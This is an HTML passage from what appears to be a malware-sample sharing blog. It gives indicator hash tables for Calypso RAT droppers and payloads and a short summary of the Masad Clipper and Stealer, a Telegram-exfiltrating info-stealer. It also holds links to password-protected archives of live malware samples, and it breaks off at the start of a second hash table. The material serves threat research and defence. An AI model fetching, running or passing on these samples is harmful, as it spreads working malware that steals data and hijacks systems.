<span style="font-family: inherit;"><a href="http://contagio.deependresearch.org/APT/China/CalypsoAPT_win_samp.zip" style="color: #660000; text-decoration-line: none;">Download. Email me if you need the password (see in my profile)</a></span></div>
<div style="background-color: white; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 14px;">
<span style="font-family: inherit;"><br /></span></div>
<div style="background-color: white; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 14px;">
<span style="font-family: inherit;"></span><br />
<div style="text-align: center;">
<span style="font-family: inherit;"><br /></span></div>
<span style="font-family: inherit;"><a href="https://www.blogger.com/null" name="more" style="color: #660000; text-decoration-line: none;"></a></span></div>
<div style="background-color: white; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 14px;">
<div style="background-color: #618f2b; color: white; line-height: 19px; text-align: center;">
<b>Hashes</b></div>
<div>
<b><br /></b></div>
<div><br /><b><br /></b></div>
<div><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrSEOwtrdYevFHuY-4JpIIeoO1awr1wmLBFiiACgxLOLb4HpM9C_bJojBq-Cjx5Bs9mIIx7YfaJ0gMxUGzooyUDKWnzmapNl4GfmxO_4mukZluU9VFyGSv5ric9plOllubOd5F5lmtAA0/s1600/Untitled_Artwork+%252831%2529.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1183" data-original-width="1600" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrSEOwtrdYevFHuY-4JpIIeoO1awr1wmLBFiiACgxLOLb4HpM9C_bJojBq-Cjx5Bs9mIIx7YfaJ0gMxUGzooyUDKWnzmapNl4GfmxO_4mukZluU9VFyGSv5ric9plOllubOd5F5lmtAA0/w171-h125/Untitled_Artwork+%252831%2529.png" width="171" /></a></div>
<br class="Apple-interchange-newline" />
<table class="tableizer-table" style="border: 1px solid rgb(204, 204, 204); color: #1c1c1c; font-family: Arial, Helvetica, sans-serif; font-size: 12px; margin: 0px auto; text-align: center;"><thead>
<tr class="tableizer-firstrow"><th style="background-color: #548b00; color: white; text-align: left;">MD5</th><th style="background-color: #548b00; color: white; text-align: left;">SHA256</th><th style="background-color: #548b00; color: white; text-align: left;">SHA1</th><th style="background-color: #548b00; color: white; text-align: left;">Filename</th><th style="background-color: #548b00; color: white; text-align: left;">File Tyee</th><th style="background-color: #548b00; color: white; text-align: left;">Stage</th></tr>
</thead><tbody>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">aa1cf5791a60d56f7ae6da9bb1e7f01e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">d5afa3bfd423ba060207ad025467feaa56ac53d13616ac8782a7f63c9fc0fdb4</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">bdd8b9115d1ae536d0ea1e62052485e5ad10761f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">MPSSVC.dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Payload</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">1e765fed294a7ad082169819c95d2c85</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">f6a09372156a8aef96576627a1ed9e57f194b008bb77e32ca29ac89505f933f0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">60dda7ccd9ae00701046923b619a1b9c33c8e2ac</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Wscntfy.exe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe exe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Dropper</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">17e05041730dcd0732e5b296db16d757</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">b6c21c26aef75ad709f6c9cfa84bfa15b7ee709588382ce4bc3544a04bceb661</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">f3301405d8ad5b160747241d6b2a8d88bf6292e8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe exe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Dropper</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">1ed72c14c4aab3b66e830e16ef90b37b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">eebff21def49af4e85c26523af2ad659125a07a09db50ac06bd3746483c89f9d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">dc0d0a34f107d140d9e47582e17a7fec945403ea</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">coal.exe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe exe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Dropper</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">e24a62d9826869bc4817366800a8805c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">c407c3dde18c9b56ed24492ca257d77a570616074356b8c7854a080823f7ee17</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">53791c9e7c41931a6becb999fee4eb7daf9b1a11</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">data01.bin</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Dropper</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">c9c39045fa14e94618dd631044053824</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">ab39301d45045172ad41c9a89210fdc6f0d3f9dccb567fd733b0dbffbfcfbcc3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">1cda28bc307c09508dbb1f3495a967bbcc29326e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe exe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Dropper</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">69322703b8ef9d490a20033684c28493</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">e6a3b43acdaa824f3280095b10798ea341839f7d43f0460df8989f13c98fa6e0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">f203680d97705d99f92fe9797691be6177f5fd41</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">RasCon.dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Dropper</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">85ce60b365edf4beebbdd85cc971e84d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">5dfdee5dd680948d19ab4d16df534cf10aca5fa0b157c59659d6517fe897c62f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">d9c14f7b6de8e26ae33e41a72ae8e35bb1af4434</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe exe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Dropper</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">6347e42f49a86aff2dea7c8bf455a52a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">281583aca23f8fd8745dd88a600cbfc578d819859a13957ec022b86c3c1c99f4</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">8b2a81af85590e0e36efc1c05aa4f0600ea21545</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">HIDMgr.dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Dropper</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">cb914fc73c67b325f948dd1bf97f5733</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">0031c7b63c1e1cd36d55f585d97e2b21a13a19858d5a1aa5455e5cc64b41e6e9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">37ce4d0a3168e3b2f80b3fae38082e68a454aee0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe exe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Dropper</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">c84df4b2cd0d3e7729210f15112da7ac</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">4e8351ddaff18f7df6fcc27a3c75598e0c56d3b406818d45effb4e78616092c2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">41a0c5a1aad36f405c8755613c732591e3300f97</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">mscorsvw.dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Dropper</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">5199ef9d086c97732d97eddef56591ec</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">511683c8ee62478c2b45be1f782ce678bbe03c4349a1778651414803010b3ee9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">d19a786adc09dff84642f2c2e0386193fa2a914b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">dnscache.dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">FlyingDutchman</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">06c1d7bf234ce99bb14639c194b3b318</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">a9a82099aa812d0c4025bee2b34f3b34c1d102773e36f1d50648815913dbe03d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">464ab9e11d371bf24de46c98c295d4afe7e957c1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">fromResource.exe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pedll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">FlyingDutchman</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">617d588eccd942f243ffa8cb13679d9c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">0664b09a86ec2df7dfe01a93e184a1fa23df66ea82cab39000944e418ec1f7b2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">1b043fdcb582ed13cbf7dabcef6527762b5be93c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Hussar</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">2807236c2d905a0675878e530ed8b1f8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">314e438198f8cc2ee393c75f8e9f2ebd2b5133fd6f2b7deb1178f82782fc6330</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">2f6fe857632a67e87f4f3631bfa93713ccdf168a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">AeLookupMgr.dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Payload</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">cce8c8ee42feaed68e9623185c3f7fe4</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">38cc404437b936660066b71cc87a28af1995248d6d4c471706eb1dd347129b4b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">9d2235c911b86bb6ad55d953a2f56ea78c5478e5</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">AppCert.dll.crt</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Payload</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">e1a578a069b1910a25c95e2d9450c710</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">413622ded5d344a5a78de4fea22cfdabdeb4cdccf69e9a1f58f668096c324738</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">36087a5b0809dc3f9dc5a77355a88e99af491a88</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">RasCfgMan.dll.crt</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Payload</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">0d532484193b8b098d7eb14319cefcd3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">f8043d6bfc3e63d8561f7f74e65cb7ff1731577ecf6c7559795d9de21298f0fc</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">31f4c6dc6ce78b4e0439b30c830dfd5d9a3fc4fe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">RasCfgMan.dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Payload</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">974298eb7e2adfa019cae4d1a927ab07</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">0461710e681fd6dc9f1c83b57f94a88cd6df9e6432174cbfdd70dfd24577a0f8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">41bc37679ce3caeecc176d10b4f8259918e25807</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">VirtualUMP.dll.crt</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Payload</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">05f472a9d926f4c8a0a372e1a7193998</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">8017923cd8169bf951106f053408b425f1eb310a9421685638ead55bb3823db3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">8d909bd3450ebe0cffd0cb17b91bc28d23ef5083</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">EFSProvider.dll.crt</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Payload</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">d1a1166bec950c75b65fdc7361dcdc63</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">f3f38c097b0cc5337b7d2dbec098bf6d0a3bb4a3e0336e7b1c8af75268a0a49d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">5731350f68a74fb4762c4ea878ecff635588a825</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">RasCon.dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe dll 64bits assembly</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Payload</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">e3e61f30f8a39cd7aa25149d0f8af5ef</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">c4dc7519bccc24c53794bf9178e4a4d0823875c34479d01cedbb3e9b10f5c730</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">1b75ea494c3ac171c5177bdcc263b89a3f24f207</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">MPSSVC.dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">pe dll</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">Calypso RAT Payload</td></tr>
</tbody></table>
</div>
<div>
</div>
</div>
</div>
</div>
</div>
</div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com0tag:blogger.com,1999:blog-7885177434994542510.post-18765063108055388032019-10-06T23:48:00.008-04:002023-02-12T15:31:03.251-05:00Masad Clipper and Stealer - Windows spyware exfiltrating data via Telegram (samples)<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: left;" trbidi="on"><span style="font-family: inherit;"><br /></span>
</div>
<div style="text-align: left;" trbidi="on">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaVpXKDgOaLVr-WJM235EMUbyv6-4Nz1-rpgEYANamL5g8Zg8No8RupLeqOm_QHg0tNGXWxJ3J9dEcuaYFLAg9tAXg_vlaG08YUxFvH98As3m9m4rQ8eOD4EoIVvsJqnkCOFT-LeatH7w/s1600/IMG_1517-1.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="clear: left; color: #660000; float: left; line-height: 19.6px; margin-bottom: 1em; margin-left: 1em;"><span style="font-family: inherit;"></span></a><a href="https://forums.juniper.net/t5/Threat-Research/Masad-Stealer-Exfiltrating-using-Telegram/ba-p/468559"><span style="font-family: inherit;"></span></a><span style="font-family: inherit;"><div class="separator" style="clear: both; text-align: center;"><a href="https://forums.juniper.net/t5/Threat-Research/Masad-Stealer-Exfiltrating-using-Telegram/ba-p/468559"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimPoh563xEwH8WkW6AXJ3GQD3JlNx3p9gC71lM44Z6AdLSoMr7_yeAyqRqhbiaCD_1kBs2dGEQB9t2wnhiVAGm3ZaF6lAB7ZrAyqyuIDzIVb9G7XrK-IljP34Q5_wsbaT_swlTmmwpEkeId7yyM9SCKMpYKyROvNY606USiUQJPuv5rZogS885dmCx/s482/image%20(3).png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="482" data-original-width="463" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimPoh563xEwH8WkW6AXJ3GQD3JlNx3p9gC71lM44Z6AdLSoMr7_yeAyqRqhbiaCD_1kBs2dGEQB9t2wnhiVAGm3ZaF6lAB7ZrAyqyuIDzIVb9G7XrK-IljP34Q5_wsbaT_swlTmmwpEkeId7yyM9SCKMpYKyROvNY606USiUQJPuv5rZogS885dmCx/w230-h240/image%20(3).png" width="230" /></a></div><br />2019-09-25 Juniper. Masad Stealer: Exfiltrating using Telegram </span></div>
<div style="text-align: left;" trbidi="on"><span style="font-family: inherit;"><span style="font-family: inherit;"><br /></span></span></div><div style="text-align: left;" trbidi="on">
<span style="font-family: inherit;"><span style="font-family: inherit;">“Masad Clipper and Stealer” steals browser information, computer files, and automatically replaces cryptocurrency wallets from the clipboard with its own.</span></span></div>
<div style="text-align: left;" trbidi="on">
<span style="font-family: inherit;">It is written using Autoit scripts and then compiled into a Windows executable.</span><br />
<span style="font-family: inherit;">It uses Telegram to exfiltrate stolen information.</span></div><div style="text-align: left;" trbidi="on"><br class="Apple-interchange-newline" /><span style="color: #0000ee; text-decoration-line: underline;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; padding: 0px; position: relative;" /></a></span><a href="https://s3.amazonaws.com/contagio.deependresearch.org/crime/kpotstealer(proofpoint)_win_samp.zip">Download. Email me if you need the password (see in my profi</a></span><span style="color: #0000ee; text-decoration-line: underline;"><a href="https://s3.amazonaws.com/contagio.deependresearch.org/crime/kpotstealer(proofpoint)_win_samp.zip">le)</a></span></div><div style="text-align: left;" trbidi="on"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; padding: 0px; position: relative;" /></a><a href="https://s3.amazonaws.com/contagio.deependresearch.org/crime/kpotstealer_win_samp.zip">Download 2</a></div><div style="text-align: left;" trbidi="on"><span style="color: #0000ee;"><u><br /></u></span>
<div style="text-align: left;"></div><div style="text-align: center;"><br /></div><div style="text-align: center;"> <a href="https://airtable.com/shr2iB6e8g1DLJKWH" style="color: #660000; font-family: verdana; text-align: left; text-decoration-line: none;" target="_blank">Malware Inventory (work in progress)</a></div><div style="text-align: center;"><span style="font-family: inherit;"><br /></span><span><a name='more'></a></span><div style="text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s43/ba.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="43" data-original-width="43" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s1600/ba.png" width="43" /></a><span style="font-family: verdana;">Links updated: Feb 12, 2023</span></div></div></div><div dir="ltr" trbidi="on">
<div style="line-height: 19.6px;">
<div style="line-height: 19px;">
<div style="text-align: left;">
<span style="font-family: inherit;"><br />
</span></div>
<div style="line-height: 19px; text-align: left;"><span style="clear: left; float: left; font-family: inherit; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="788" data-original-width="750" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaVpXKDgOaLVr-WJM235EMUbyv6-4Nz1-rpgEYANamL5g8Zg8No8RupLeqOm_QHg0tNGXWxJ3J9dEcuaYFLAg9tAXg_vlaG08YUxFvH98As3m9m4rQ8eOD4EoIVvsJqnkCOFT-LeatH7w/w139-h146/IMG_1517-1.jpg" width="139" /></span>
<div>
<span style="font-family: inherit;"><a href="https://blogs.juniper.net/en-us/threat-research/masad-stealer-exfiltrating-using-telegram" target="_blank">Masad Stealer: Exfiltrating using Telegram - Juniper Blogs </a> </span></div><div><a href="https://s3.amazonaws.com/contagio.deependresearch.org/read/Crime_2020_Kpot_InfoSec+Handlers+Diary+Blog+-+SANS+Internet+Storm+Center.pdf"><br /></a></div><div><a href="http://contagio.deependresearch.org/read/Masad+Stealer_2019_+Exfiltrating+using+Telegram+_+Official+Juniper.pdf"> PDF file </a></div><div><br /></div></div>
<div style="text-align: left;"><br /><br /></div>
<div style="text-align: left;"><span style="font-family: inherit;"><br /></span></div><div style="text-align: left;"><span style="font-family: inherit;"><br /></span></div><div style="text-align: left;"><span style="font-family: inherit;"><br /></span></div><div style="text-align: left;"><span style="font-family: inherit;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-family: inherit;"><br /></span></div>
<span style="font-family: inherit;"><a href="https://www.blogger.com/null" name="more"></a></span></div>
<div style="text-align: left;">
<div style="background-color: #618f2b; color: white; line-height: 19px; text-align: center;">
<b><span style="font-family: inherit;">Hashes</span></b></div>
<div style="background-color: white;">
</div>
</div>
<div style="text-align: left;">
<br /></div>
<div class="samplearea" style="border: 0px; color: #1c1c1c; font-family: Raleway, Helvetica, Arial, sans-serif; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: inherit; margin: 0px 0px 2em; padding: 0px; text-align: center; vertical-align: baseline;">
<table class="tableizer-table" style="border: 1px solid rgb(204, 204, 204); font-family: Arial, Helvetica, sans-serif; font-size: 9px; margin: 0px auto;"><thead>
